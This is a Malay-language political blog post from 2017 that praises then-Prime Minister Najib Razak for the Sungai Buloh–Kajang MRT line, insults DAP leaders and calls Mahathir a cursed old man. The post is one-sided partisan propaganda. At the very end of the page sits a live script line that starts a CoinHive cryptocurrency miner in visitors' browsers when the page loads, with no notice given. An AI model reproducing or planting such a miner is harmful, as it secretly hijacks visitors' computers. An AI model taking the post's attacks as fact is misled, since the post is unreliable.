© Copyright 2017, All Rights Reserved
Home / Blog / #JOMNAIKMRT Sungguh Sempurna Buatkan Pemimpin DAP Mati Akal..Tahniah @NajibRazak @SPADChannel

#JOMNAIKMRT Sungguh Sempurna Buatkan Pemimpin DAP Mati Akal..Tahniah @NajibRazak @SPADChannel

Nampaknya pemimpin DAP seperti tidak keruan melihat kejayaan Perdana Menteri,DS Najib dengan idea bijaknya membina MRT 2 Sg Buloh – Kajang..

Setelah meneliti projek MRT ini sungguh sempurna maka mereka terus mati akal untuk mencari sekelumat kekurangan untuk menenam kebencian kepada Barisan Nasional..

Disebabkan kesipuan untuk memuji maka mereka memainkan sentimen kejayaan MRT bersumberkan dari cukai rakyat..apalah salahnya memuji kejayaan MRT dan DS Najib untuk projek mega yang power ini?

Lupakah mereka yang gaji mereka juga daripada duit cukai kita?inilah namanya orang yang tiada modal tetapi iri hati dan hasad dengki..

Kami hendak bertanya dengan DAP..sedarkah DAP bahawa apa yang anda lakukan itu secara tidak langsung telah menghina sumbangan Tun M selama 22 tahun..seolah-olah situa kutuk itu tidak ada satu pun sumbangan terhadap pembangunan negara..sebenarnya apa sahaja kejayaan Mahathir juga berpunca daripada duit cukai rakyat..

Jika inipun hendak dipertikaikan apa guna DAP untuk memerintah negara..anda juga guna duit cukai rakyat..jadi janganlah tunjukkan kebodohan diri sehingga memakan diri sendiri…jika tidak mahu memuji..lebih elok berdiam diri..

Ikuti kisah lanjut mengenai MRT di SINI


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

@RafiziRamli … Notis Kebangkrapan Dan Pengubahan Wang Haram

Semalam, Rafizi Ramli telah mendedahkan nama penuh semua orang yang menyumbangkan kepada ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();